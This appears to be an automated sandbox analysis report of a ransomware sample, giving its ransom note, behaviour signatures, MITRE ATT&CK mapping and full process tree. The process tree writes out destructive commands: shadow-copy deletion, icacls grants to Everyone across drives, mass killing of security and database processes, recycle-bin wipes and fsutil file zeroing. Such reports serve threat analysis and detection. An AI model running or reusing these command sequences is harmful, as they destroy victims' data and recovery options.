Resubmissions

12-06-2024 08:28

240612-kcy2jawckj 10

10-06-2024 17:27

240610-v1ktxsvbpk 10

Analysis

  • max time kernel
    18s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags
    arch:x64 arch:x86 image:win11-20240426-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    10-06-2024 17:27

General

  • Target

    Mydoom/Mydoom Ransomwares/5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe

  • Size

    100KB

  • MD5

    7fdd3bf8886199e8336f95c88bcaa49a

  • SHA1

    77e2019093379de4d5de07dbcf5893831c9bb7ec

  • SHA256

    5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc

  • SHA512

    9d774eca21fb33f26991cf20f0f6a2f0bce56aa4cc3d17fd769e0bb767ca400cd5c8dd64bb62db23bf5bc112b91b1a26db7bf2f9d85993cb990be5113e527a40

  • SSDEEP

    1536:1zmSA404oATJVPHEMXMxa6CO3/k/hdXVyczH+95DfFFjfuEnm:1zxEYsZaLhdlo95DfFFjfuCm

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note
All your files have been encrypted due to a security problem with your PC.
If you want to restore them, write us to the e-mail [email protected]
or: [email protected] (Backup mail)
Send us this file RESTORE_FILES_INFO
=================================================================================================================
Free decryption as a guarantee
Before paying, you can send 1-2 files for free decryption.
File format: txt doc pdf jpeg jpg gif png bmp
Total file size should not exceed 2 MB (without archive)
======================================================
You can buy Bitcoins here: https://localbitcoins.com
Or use the search how to buy Bitcoins in your country
=================================================================================================================
IMPORTANT!!!
Remember that your files are encrypted and only WE can recover them!
Do not try to recover yourself, as well as on third-party resources, you will lose your files and money forever!
=================================================================================================================
Key Identifier:
Number of files that were processed is: 1095
PC Hardware ID: 3EBBE295

Signatures

  • Disables service(s) 3 TTPs
  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 48 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Mydoom\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
    "C:\Users\Admin\AppData\Local\Temp\Mydoom\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe"
    1⤵
    • Drops startup file
    • Modifies WinLogon
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4980
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4484
    • C:\Windows\SYSTEM32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
      PID:804
    • C:\Windows\SYSTEM32\reg.exe
      "reg" delete HKCU\Software\Raccine /F
      2⤵
      • Modifies registry key
      PID:4232
    • C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /DELETE /TN "Raccine Rules Updater" /F
      2⤵
      PID:3604
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config Dnscache start= auto
      2⤵
      • Launches sc.exe
      PID:4412
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config FDResPub start= auto
      2⤵
      • Launches sc.exe
      PID:1840
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SSDPSRV start= auto
      2⤵
      • Launches sc.exe
      PID:3692
    • C:\Windows\SYSTEM32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
      2⤵
      • Modifies Windows Firewall
      PID:2156
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config upnphost start= auto
      2⤵
      • Launches sc.exe
      PID:2964
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      2⤵
      • Launches sc.exe
      PID:3404
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      2⤵
      • Launches sc.exe
      PID:3348
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLWriter start= disabled
      2⤵
      • Launches sc.exe
      PID:1588
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SstpSvc start= disabled
      2⤵
      • Launches sc.exe
      PID:2400
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1880
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM firefoxconfig.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1532
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM excel.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4616
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM CNTAoSMgr.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3048
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:696
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM agntsvc.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1652
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1156
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlwriter.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2620
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM thebat.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1676
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3432
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM tbirdconfig.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2648
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM steam.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2296
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqbcoreservice.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3976
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM dbeng50.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4596
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM thebat64.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:656
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM encsvc.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2744
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" IM thunderbird.exe /F
      2⤵
      • Kills process with taskkill
      PID:1548
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM dbsnmp.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:5072
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM ocomm.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1896
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM isqlplussvc.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3476
    • C:\Windows\SYSTEM32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
      2⤵
      • Modifies Windows Firewall
      PID:3840
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM xfssvccon.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3924
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM infopath.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1412
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM onenote.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3144
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4192
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mbamtray.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1804
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM PccNTMon.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:5060
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM Ntrtscan.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:5052
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM zoolz.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1800
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM msaccess.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:548
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM tmlisten.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2436
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2932
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM outlook.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2172
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM msftesql.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:848
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM winword.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2892
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM ocautoupds.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4604
    • C:\Windows\SYSTEM32\arp.exe
      "arp" -a
      2⤵
      PID:2432
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld-nt.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3952
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM powerpnt.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1380
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM ocssd.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1080
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2392
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM wordpad.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4992
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM oracle.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4176
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM visio.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1852
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld-opt.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:5096
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlagent.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1424
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlservr.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1900
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlbrowser.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2284
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM synctime.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3728
    • C:\Windows\SYSTEM32\icacls.exe
      "icacls" "C:*" /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1672
    • C:\Windows\SYSTEM32\icacls.exe
      "icacls" "D:*" /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:2520
    • C:\Windows\SYSTEM32\icacls.exe
      "icacls" "Z:*" /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:3620
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
      2⤵
      PID:1720
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c rd /s /q D:\\$Recycle.bin
      2⤵
      PID:4316
    • C:\Windows\SYSTEM32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
      2⤵
      • Modifies Windows Firewall
      PID:3920
    • C:\Windows\SYSTEM32\netsh.exe
      "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
      2⤵
      • Modifies Windows Firewall
      PID:4140
    • C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:4100
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
      2⤵
      PID:5096
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.7 -n 3
        3⤵
        • Runs ping.exe
        PID:4644
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=524288 “%s”
        3⤵
        PID:2592
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Mydoom\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
      2⤵
      PID:396
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        3⤵
        PID:252

Network

MITRE ATT&CK Matrix ATT&CK v13

  • Execution
    System Services (1) T1569
    Service Execution (1) T1569.002
  • Persistence
    Create or Modify System Process (2) T1543
    Windows Service (2) T1543.003
    Boot or Logon Autostart Execution (1) T1547
    Winlogon Helper DLL (1) T1547.004
  • Privilege Escalation
    Create or Modify System Process (2) T1543
    Windows Service (2) T1543.003
    Boot or Logon Autostart Execution (1) T1547
    Winlogon Helper DLL (1) T1547.004
  • Defense Evasion
    Impair Defenses (1) T1562
    Disable or Modify System Firewall (1) T1562.004
    File and Directory Permissions Modification (1) T1222
    Modify Registry (3) T1112
  • Discovery
    System Information Discovery (1) T1082
    Remote System Discovery (1) T1018
    Query Registry (1) T1012
  • Impact
    Service Stop (1) T1489


Downloads

  • C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edbres00002.jrs.[ID-3EBBE295].[[email protected]].CRYSTAL
    Filesize 1024KB
    MD5 3b0ece53c6aad8f9cd08bd7db0823425
    SHA1 e5b4e9b394bef01cafa077430270bbc4715e3455
    SHA256 58719df28ab4d8b14bfb11fcb67a32ffbf8eb008ba8e9470f98e4efbda2ec87d
    SHA512 41a984a088c5871f01e72ca8fa0e013899e04e22998a872f517a9a0b5878b48cc8f07f1031f32e3e7291ef76ec664a5814ac313721f6211c175d1590e04dba29
  • C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.[ID-3EBBE295].[[email protected]].CRYSTAL
    Filesize 728KB
    MD5 c1b33ac17ed5aa21146b14cbbbe35e93
    SHA1 a76ae4b5fd5747b0ed4015e7a7b3340326dd5de3
    SHA256 81f314a7090de423ff0514701f97acc4849be1afb54733f1b40b2bb88de68141
    SHA512 9ed4db9e878eb78e085ce12bacc9956d3757d7e717e85e4931c59a426fccafc067917e1af56eb59eeee702b887f571e267ca8da4d77579cbc5da23337ec71585
  • C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.[ID-3EBBE295].[[email protected]].CRYSTAL
    Filesize 180KB
    MD5 f5fdeabf3ff6ea3eba22d1e171e55e1a
    SHA1 c948221370f93105131328788ede7e5355c18748
    SHA256 5a4398fbd684c81972b7f9d589a96af02e55e0e713803168d263b8cb1087b96f
    SHA512 8906266ce09530ca8c0472b5ac7cfbaf707d1d3510d0017e92890e9b23c1bc51c1f18d7df5b24dbd406c8221bd323d2c0792d73f074cec33ded3e107ebbb6f3e
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ujjebxsp.cni.ps1
    Filesize 60B
    MD5 d17fe0a3f47be24a6453e9ef58c94641
    SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
    Filesize 1KB
    MD5 3ea5976c5d4ce4d661ca7dedaad98eb2
    SHA1 70856a88756c1b2ee0d8a7132d0c0f503bf9e5bc
    SHA256 dde35a10d7dfd2f9fba9f087a9a673d698f8fa95baa8051ddfaaf5e0879b4523
    SHA512 75d9f06080834e885830995e39ace35b5c87c7ab215620e43e6d9795c9ed4234d9c6c0f57bf3cbf6b1ec9aba8a9fd32715a49fe0673f16a92e4aa21281e378b3
  • memory/3728-11-0x000002AEB86C0000-0x000002AEB86E2000-memory.dmp
    Filesize 136KB
  • memory/4980-0-0x00000000001B0000-0x00000000001D0000-memory.dmp
    Filesize 128KB
  • memory/4980-1-0x00007FFF466D3000-0x00007FFF466D5000-memory.dmp
    Filesize 8KB
  • memory/4980-2-0x00007FFF466D0000-0x00007FFF47192000-memory.dmp
    Filesize 10.8MB
  • memory/4980-602-0x00007FFF466D3000-0x00007FFF466D5000-memory.dmp
    Filesize 8KB
  • memory/4980-603-0x00007FFF466D0000-0x00007FFF47192000-memory.dmp
    Filesize 10.8MB
  • memory/4980-605-0x00007FFF466D0000-0x00007FFF47192000-memory.dmp
    Filesize 10.8MB